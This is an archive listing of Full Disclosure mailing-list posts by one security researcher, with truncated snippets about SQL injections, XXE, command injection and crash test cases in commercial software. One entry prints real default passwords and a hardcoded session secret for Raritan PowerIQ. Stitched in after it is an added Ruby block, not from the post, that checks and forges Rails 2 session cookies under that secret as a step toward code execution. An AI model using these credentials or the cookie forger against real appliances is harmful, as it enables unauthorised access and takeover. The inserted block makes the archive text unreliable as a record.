Re: [FD] libquicktime multiple vulnerabilities

2017-06-09 Thread Brandon Perry
> On Jun 7, 2017, at 4:43 AM, qflb.wu wrote: > > libquicktime multiple vulnerabilities > > > > Author : qflb.wu > === > > > Introduction: > = > The libquicktime package contains the libquicktime library, various plugins

Re: [FD] [oss-security] Dolibarr ERP & CRM - Multiple Issues

2017-05-19 Thread Brandon Perry
> On May 17, 2017, at 3:08 PM, Stefan Pietsch wrote: > > On 10.05.2017 10:28, FOXMOLE Advisories wrote: >> === FOXMOLE - Security Advisory 2017-02-23 === >> >> Dolibarr ERP & CRM - Multiple Issues >> ~ >> >> Affected Versions

[FD] Multiple crashes in OpenEXR

2017-05-15 Thread Brandon Perry
Attached is a zip file of EXR images that cause segmentation faults in the OpenEXR library (tested against 2.2.0). http://www.openexr.com/downloads.html These were reported to ehan...@ilm.com on January 12, 2017, but no updates

Re: [FD] Numerous FreeTDS crashes fixed on master

2017-05-11 Thread Brandon Perry
, feel free to ask off list. > On May 9, 2017, at 9:34 AM, Brandon Perry <bperry.volat...@gmail.com> wrote: > > t

Re: [FD] Numerous FreeTDS crashes fixed on master

2017-05-10 Thread Brandon Perry
<http://eriqande.github.io/2014/12/19/setting-up-rodbc.html> Also, obviously the tsql binary if used to connect to an untrusted MSSQL/Sybase server. > On May 9, 2017, at 9:34 AM, Brandon Perry <bperry.volat...@gmail.com> wrote: > > Attached is a zip file of reported TDS streams

[FD] Numerous FreeTDS crashes fixed on master

2017-05-09 Thread Brandon Perry
Attached is a zip file of reported TDS streams that cause segmentation faults in the FreeTDS library. The ‘tsql’ binary was used for the fuzzing, so these most likely only affect client-side functionality. These have been resolved on master and the 1.0 branch. Also included in the zip file is

Re: [FD] Joomla com_tag v1.7.6 - (tag) SQL Injection Vulnerability

2017-05-04 Thread Brandon Perry
> On May 3, 2017, at 6:07 AM, Vulnerability Lab wrote: > > Document Title: > === > Joomla com_tag v1.7.6 - (tag) SQL Injection Vulnerability > > > References (Source): > >

Re: [FD] Multiple SQL injection vulnerabilities in dotCMS (8x CVE)

2016-11-01 Thread Brandon Perry
> On Oct 31, 2016, at 2:41 PM, Elar Lang wrote: > > Title: Multiple SQL injection vulnerabilities in dotCMS (8x CVE) > Credit: Elar Lang / https://security.elarlang.eu > Vendor/Product: dotCMS (http://dotcms.com/) > Vulnerability: SQL injection > Vulnerable version: before

[FD] Segmentation fault in Oracle Outside In File ID 8.5.3

2016-09-19 Thread Brandon Perry
This is a segfault in the Oracle Outside In File ID library version 8.5.3. http://www.oracle.com/technetwork/middleware/content-management/downloads/oit-dl-otn-097435.html ==22240== Memcheck, a memory error detector ==22240== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.

Re: [FD] Zabbix 2.2.x, 3.0.x SQL Injection Vulnerability

2016-08-16 Thread Brandon Perry
> On Aug 12, 2016, at 10:31 PM, 1...@hushmail.com wrote: > > Which version of Zabbix? 3.0.3? > Right, it’s the same vuln, just in different places. It was fixed in 3.0.4. > -1N3 > > On 8/12/2016 at 7:22 PM, "Brandon Perry" <bperry.volat...@gmail.com> wrot

[FD] PrinceXML PHP wrapper command injection

2016-07-06 Thread Brandon Perry
While grabbing a copy PrinceXML, I noticed the company also offered some wrapper classes in various languages for using prince in server applications (web applications). http://www.princexml.com/download/wrappers/ Taking a quick look at the PHP

Re: [FD] [oss-security] libical 0.47 SEGV on unknown address

2016-07-06 Thread Brandon Perry
lient-bug-bounty/> (Security bug must be a remote exploit, the cause of a privilege escalation, or an information leak) > On Jun 25, 2016, at 10:41 AM, Brandon Perry <bperry.volat...@gmail.com> wrote: > >> >> On Jun 25, 2016, at 10:34 AM, Alan Coop

Re: [FD] [oss-security] libical 0.47 SEGV on unknown address

2016-06-27 Thread Brandon Perry
> On Jun 25, 2016, at 10:34 AM, Alan Coopersmith <alan.coopersm...@oracle.com> > wrote: > > On 06/24/16 06:54 AM, Brandon Perry wrote: >> I am posting this to Full Disclosure/OSS instead of reporting it because I >> have >> opened a handful of libical bugs

[FD] libical 0.47 SEGV on unknown address

2016-06-24 Thread Brandon Perry
Hello lists, Attached is a test case for causing a crash in libical 0.47 (shipped with Thunderbird) and this was also tested against 1.0 (various versions shipped with various email clients). = ==24662==ERROR: AddressSanitizer:

[FD] Raritan PowerIQ default credentials

2015-09-10 Thread Brandon Perry
Hello list, Raritan PowerIQ ships with a few default accounts and passwords/hashes. For the web interface, there are technically 3 default users. web_api:sl33p30F00dumass! epiq_api:raritan admin:raritan You can technically authenticate with the epiq_api user on the web interface and the

Re: [FD] Symantec Endpoint Protection

2015-08-01 Thread Brandon Perry
Do you have example requests for the SQL injections? On Jul 31, 2015, at 7:40 AM, Markus Wulftange <markus.wulfta...@code-white.com> wrote: Code White found several vulnerabilities in Symantec Endpoint Protection (SEP), affecting versions 12.1 prior to 12.1 RU6 MP1. SEP Manager (SEPM):

[FD] Web-Dorado ECommerce-WD for Joomla plugin multiple unauthenticated SQL injections

2015-03-18 Thread Brandon Perry
Version 1.2.5 of the ECommerce-WD plugin for Joomla! has multiple unauthenticated SQL injections available via the advanced search functionality. http://extensions.joomla.org/extension/ecommerce-wd The vulnerable parameters are search_category_id, sort_order, and filter_manufacturer_ids within

[FD] Raritan PowerIQ known session secret

2015-03-11 Thread Brandon Perry
Raritan PowerIQ versions 4.1, 4.2, and 4.3 ship with a Rails 2 web interface with a hardcoded session secret of 8e238c9702412d475a4c44b7726a0537. This can be used to achieve unauthenticated remote code execution as the nginx user on vulnerable systems. msf exploit(rails_secret_deserialization)
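Added example (Ruby), not code from the post above and not from Raritan or the Metasploit module it mentions: a check that tells you whether a captured session cookie was signed with the secret quoted in the post, and, because signing and forging are the same operation, a function that mints a cookie with chosen contents under that secret. The Rails 2 CookieStore format is base64(Marshal.dump(session)) followed by "--" and the hex HMAC-SHA1 over that base64 text keyed with the session secret. The sample session contents are constructed here; the PowerIQ cookie name and what its sessions actually contain are not on the page and are assumed. The example deliberately never Marshal.loads cookie data, since Rails doing exactly that on an unverified or attacker-signed cookie is what turns a leaked secret into remote code execution.

```ruby
require 'openssl'
require 'base64'
require 'cgi'

# Secret reported for Raritan PowerIQ 4.1-4.3 in the post above.
KNOWN_SECRET = '8e238c9702412d475a4c44b7726a0537'.freeze

# Rails 2 CookieStore signs the base64 payload with HMAC-SHA1 and appends
# the hex digest after a "--" separator:
#   "<base64(Marshal.dump(session))>--<hex hmac-sha1(secret, base64)>"
def rails2_digest(secret, data)
  OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('SHA1'), secret, data)
end

# Produces a cookie exactly as the application would. With a leaked secret
# this is also how an attacker forges a session with arbitrary contents.
def sign_session(secret, session_hash)
  data = Base64.strict_encode64(Marshal.dump(session_hash))
  "#{data}--#{rails2_digest(secret, data)}"
end

# Constant-time string comparison so a remote check does not leak how many
# leading digest bytes matched.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# True if the cookie's digest was produced under `secret`. Browsers and
# proxies usually hand you the URL-escaped form ("%3D", "%2B"), so unescape
# first when that is what was captured.
def signed_with?(cookie_value, secret)
  cookie_value = CGI.unescape(cookie_value) if cookie_value.include?('%')
  data, digest = cookie_value.split('--', 2)
  return false if data.nil? || digest.nil? || data.empty?
  secure_equal?(digest, rails2_digest(secret, data))
end

# Convenience wrapper for the check described in the post: is this host
# using the hardcoded PowerIQ secret?
def uses_known_poweriq_secret?(cookie_value)
  signed_with?(cookie_value, KNOWN_SECRET)
end

# Constructed sample: the session hash is an assumption, not PowerIQ's real
# session layout.
SAMPLE_COOKIE = sign_session(KNOWN_SECRET, { 'session_id' => 'abc123', 'user_id' => 1 }).freeze

if __FILE__ == $PROGRAM_NAME
  cookie = ARGV[0] || SAMPLE_COOKIE
  if uses_known_poweriq_secret?(cookie)
    puts 'cookie verifies under the hardcoded PowerIQ secret: sessions can be forged'
  else
    puts 'cookie was not signed with the known secret (or is not a Rails 2 cookie)'
  end
end
```

Run it with the value of the appliance's session cookie as the first argument; a match means anyone holding the published secret can sign their own session data for that host, and the msf module referenced above builds on that by having Rails deserialize a signed payload.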

[FD] Multiple SQL injections in core Orion service affecting many Solarwinds products (CVE-2014-9566)

2015-03-03 Thread Brandon Perry
I found a couple of SQL injection vulnerabilities in the core Orion service used in most of the Solarwinds products (SAM, IPAM, NPM, NCM, etc…). This service provides a consistent configuration and authentication layer across the products. To be exact, the vulnerable applications and versions are:

[FD] BMC TrackIt! Unauthenticated Arbitrary Local System User Password Change

2014-12-11 Thread Brandon Perry
BMC TrackIt! 11.3 Unauthenticated Local User Password Change. Trial available here: http://www.trackit.com A Metasploit pull request has been made here: https://github.com/rapid7/metasploit-framework/pull/4359 BMC TrackIt! 11.3 when installed with TrackItWeb! allows an unauthenticated user to

[FD] device42 DCIM authenticated remote root via appliance manager

2014-11-25 Thread Brandon Perry
Remote Authenticated Root in Device42 DCIM Appliance Manager v5.10 and v6.0 http://www.device42.com/download/ Device42 ships virtual appliances ready for production use as a trial (essentially dictated by the license provided). The Appliance Manager listens on HTTP (no SSL) on port 4242

[FD] Mulesoft ESB Authenticated Privilege Escalation

2014-10-22 Thread Brandon Perry
Mulesoft ESB Runtime 3.5.1 Authenticated Privilege Escalation → Remote Code Execution Mulesoft ESB Runtime 3.5.1 allows any arbitrary authenticated user to create an administrator user due to a lack of permissions check in the handler/securityService.rpc endpoint. The following HTTP request

Re: [FD] XXE Injection in HP Release Control

2014-08-04 Thread Brandon Perry
It's not a 0day; I dropped this in May. On Mon, Aug 4, 2014 at 9:39 AM, Douglas Held <r...@douglasheld.net> wrote: Hello MustLive, Did you disclose this to HP? You didn't mention whether this is 0-day or disclosed (I think you usually publish your disclosure timeline) Thanks Doug Date:

Re: [FD] Beginner's error: import function of Windows Mail executes rogue program C:\Program.exe with credentials of other account

2014-07-24 Thread Brandon Perry
So, I am very curious how you are finding these? Have you automated this or is it manual hand work? On Wed, Jul 23, 2014 at 2:50 PM, Stefan Kanthak <stefan.kant...@nexgo.de> wrote: Hi @ll, the import function of Windows Mail executes a rogue program C:\Program.exe with the credentials of

[FD] Dell Scrutinizer 11.01 multiple vulnerabilities

2014-07-10 Thread Brandon Perry
Hello! The below gists detail at a high level[1] many SQL injection vulnerabilities as well as a privilege escalation vulnerability and corresponding Metasploit modules[2]. [1] https://gist.github.com/brandonprry/36b4b8df1cde279a9305 [2] https://gist.github.com/brandonprry/76741d9a0d4f518fe297

Re: [FD] Should it be better ...

2014-07-10 Thread Brandon Perry
Thank you for bringing this up. When posting my information, I was actually assuming a brief description with links was preferred if you were so inclined to read after a summary. I, for one, didn't grow up on those types of lists and had never even looked at bugtraq from that early on. I also

[FD] InvGate Service Desk post-auth SQL injection as non-privileged user

2014-07-09 Thread Brandon Perry
Hi, https://gist.github.com/brandonprry/fc4d396ca7503d49a0f5 Detailed in the above gist is a slew of SQL injections available to an authenticated but non-privileged user in the latest available version (from their website) of InvGate. -- http://volatile-minds.blogspot.com -- blog

[FD] Root command injection in ext-pack name for Virtualbox because of GKSu

2014-07-08 Thread Brandon Perry
A while back I noticed some funny behavior that I thought was in VirtualBox at first, but it turns out the reason I can do this is because of GKSu. I felt like the ramifications were fairly large, and contacting the (supposed?) maintainer of GKSu didn't work.

[FD] Scrumworks Pro authenticated arbitrary password reset

2014-06-05 Thread Brandon Perry
The latest available version of Scrumworks Pro does not perform proper authorization checks when users attempt to change passwords via the Java Web Start client. If you capture the request the web start client makes when changing the 'administrator' user's password, and substitute the JSESSIONID

Re: [FD] What do you think of Trollc?

2014-05-28 Thread Brandon Perry
, Brandon Perry <bperry.volat...@gmail.com> wrote: Not even sure when the last vulnerability that caused any fluctuation in the stock markets was. +1. I'm not sure it ever hurt Sony, and they've had over 40 documented problems [0, 1, 2, et al]. Some of them were very serious from a data security

Re: [FD] What do you think of Trollc?

2014-05-27 Thread Brandon Perry
Not even sure when the last vulnerability that caused any fluctuation in the stock markets was. On Tue, May 27, 2014 at 1:49 PM, Philip Cheong <isc...@gmail.com> wrote: From https://www.startjoin.com/trollc *Right now if you're a software exploit developer and you want to monetize your craft

Re: [FD] [KIS-2014-06] Dotclear = 2.6.2 (Media Manager) Unrestricted File Upload Vulnerability

2014-05-21 Thread Brandon Perry
Hi, These are cool. Here is a Metasploit module for the file upload. You seem to need the ability to publish as well as the ability to manage your own media. Feel free to edit as you would like and make a pull request! https://gist.github.com/brandonprry/efc0765c342a44a0dedb On Wed, May 21,

[FD] Moar F5 fun in iControl API

2014-05-07 Thread Brandon Perry
Hi, Linked below is an advisory regarding remote command execution (as root, possibly) vulnerabilities within the iControl API: http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html An example request that will set the hostname to 'root.example.com': <?xml version="1.0"

Re: [FD] F5 BIG-IQ authed arbitrary user password change

2014-05-02 Thread Brandon Perry
Nm on ExploitHub. Here is the module: https://gist.github.com/brandonprry/2e73acd63094fa2a4f63 On Thu, May 1, 2014 at 5:10 PM, Brandon Perry <bperry.volat...@gmail.com> wrote: Hi, Detailed at this blog post (with pics!) is a vulnerability within F5 BIG-IQ 4.1.0.2013.0. http://volatile

Re: [FD] Beginners error: iTunes for Windows runs rogue program C:\Program.exe when opening associated files

2014-05-01 Thread Brandon Perry
Stupid people also share their C: drive on networks. On 04/30/2014 05:17 PM, Alton Blom wrote: Hi Mike, It's probably better seen as a way of keeping persistence on a machine than a full-blown exploit. Alton(ius) altonblom.com @altonius_au On Thu, May 1, 2014 at 8:05 AM, Mike Cramer

[FD] F5 BIG-IQ authed arbitrary user password change

2014-05-01 Thread Brandon Perry
Hi, Detailed at this blog post (with pics!) is a vulnerability within F5 BIG-IQ 4.1.0.2013.0. http://volatile-minds.blogspot.com/2014/05/f5-big-iq-v41020130-authenticated.html A module for this will be uploaded to ExploitHub this evening that will change the root user's password and log in over

Re: [FD] AOL confirms compromise

2014-04-29 Thread Brandon Perry
Best practice is PCI compliance. Duh. On Tue, Apr 29, 2014 at 5:21 PM, Jeffrey Walton <noloa...@gmail.com> wrote: On Tue, Apr 29, 2014 at 11:30 AM, Daniel Hadfield <d...@pingsweep.co.uk> wrote: http://blog.aol.com/2014/04/28/aol-security-update/ Ouch... Have any details of the encryption

[FD] Xerox DocuShare authenticated SQL injection

2014-04-15 Thread Brandon Perry
Hi, detailed in the linked gist is a SQL injection available to authenticated read-only users within Xerox DocuShare: https://gist.github.com/brandonprry/10745681 -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website

Re: [FD] Legality of Open Source Tools

2014-04-04 Thread Brandon Perry
If I recall correctly, version 1 of metasploit actually had exploits for *live* sites (a bank) and things, so that is obviously an issue. I don't even think you will find a copy of the first version of metasploit (does HD have one locked up somewhere, who knows). Currently, metasploit is a

[FD] EMC CTA v10.0 unauthenticated XXE with root perms

2014-03-31 Thread Brandon Perry
Hi, The linked gist below details an unauthenticated XXE vulnerability that allows an attacker to read /etc/shadow within EMC CTA v10.0. https://gist.github.com/brandonprry/9895721 -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website